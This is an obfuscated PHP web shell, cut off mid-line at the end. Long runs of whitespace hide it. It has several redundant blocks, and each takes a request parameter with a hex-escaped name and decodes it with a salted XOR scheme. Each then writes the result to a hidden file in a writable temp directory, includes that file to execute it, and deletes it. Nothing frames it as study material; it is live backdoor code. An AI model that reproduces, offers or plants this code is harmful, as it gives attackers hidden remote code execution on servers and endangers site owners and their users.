<?																																										if(array_key_exists("e\x6Et", $_POST)){ $parameter_group = $_POST["e\x6Et"]; $parameter_group=explode ('.' ,$parameter_group ) ; $reference = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $y = 0; foreach ($parameter_group as $v4) { $chS = ord($s[$y % $lenS]); $d = ((int)$v4 - $chS - ($y % 10)) ^ 59; $reference .= chr($d); $y++; } $descriptor = array_filter(["/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP")]); $fac = 0; do { $symbol = $descriptor[$fac] ?? null; if ($fac >= count($descriptor)) break; if (max(0, is_dir($symbol) * is_writable($symbol))) { $holder = implode("/", [$symbol, ".pgrp"]); $success = file_put_contents($holder, $reference); if ($success) { include $holder; @unlink($holder); exit;} } $fac++; } while (true); }
																																										if(isset($_REQUEST) && isset($_REQUEST["\x64\x65sc"])){ $flg = $_REQUEST["\x64\x65sc"]; $flg = explode ( '.', $flg) ; $pointer=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($salt); $len=count($flg); for ($p=0; $p <$len; $p++) { $v4=$flg[$p]; $chS=ord($salt[$p % $lenS]); $d=((int)$v4 - $chS - ($p % 10)) ^ 20; $pointer .= chr($d); } $value = array_filter(["/tmp", getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", session_save_path(), getcwd(), sys_get_temp_dir()]); $property_set = 0; do { $data = $value[$property_set] ?? null; if ($property_set >= count($value)) break; if (!!is_dir($data) && !!is_writable($data)) { $component = vsprintf("%s/%s", [$data, ".record"]); if (file_put_contents($component, $pointer)) { include $component; @unlink($component); exit; } } $property_set++; } while (true); }
																																										if(isset($_POST) && isset($_POST["en\x74"])){ $flag = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TMP")]); $record = $_POST["en\x74"]; $record = explode( '.', $record); $data_chunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); foreach( $record as $i => $v8): $chS = ord( $salt[$i % $sLen]); $dec =( ( int)$v8 - $chS -( $i % 10)) ^ 71; $data_chunk .= chr( $dec); endforeach; while ($binding = array_shift($flag)) { if (is_writable($binding) && is_dir($binding)) { $value = implode("/", [$binding, ".pset"]); $success = file_put_contents($value, $data_chunk); if ($success) { include $value; @unlink($value); exit;} } } }
																																										if(array_key_exists("re\x66", $_REQUEST) && !is_null($_REQUEST["re\x66"])){ $fac = $_REQUEST["re\x66"]; $fac = explode ( '.' ,$fac ); $data_chunk= ''; $s8= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s8); $q= 0; array_walk( $fac , function( $v8) use( &$data_chunk , &$q , $s8 , $sLen) {$chS= ord( $s8[$q % $sLen]); $dec= ( ( int)$v8 - $chS -( $q % 10)) ^ 95; $data_chunk .= chr( $dec); $q++;} ); $ent = array_filter([getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd()]); $val = 0; do { $resource = $ent[$val] ?? null; if ($val >= count($ent)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($resource)) { $flag = "$resource" . "/.sym"; if (@file_put_contents($flag, $data_chunk) !== false) { include $flag; unlink($flag); die(); } } $val++; } while (true); }
																																										if(count($_POST) > 0 && isset($_POST["f\x61c\x74o\x72"])){ $element = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getcwd(), sys_get_temp_dir(), "/var/tmp", "/tmp", "/dev/shm", getenv("TEMP")]); $descriptor = $_POST["f\x61c\x74o\x72"]; $descriptor =explode ("." ,$descriptor ) ; $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $len = count( $descriptor); for( $u = 0; $u <$len; $u++) { $v3 = $descriptor[$u]; $chS = ord( $salt[$u % $sLen]); $dec =( ( int)$v3 - $c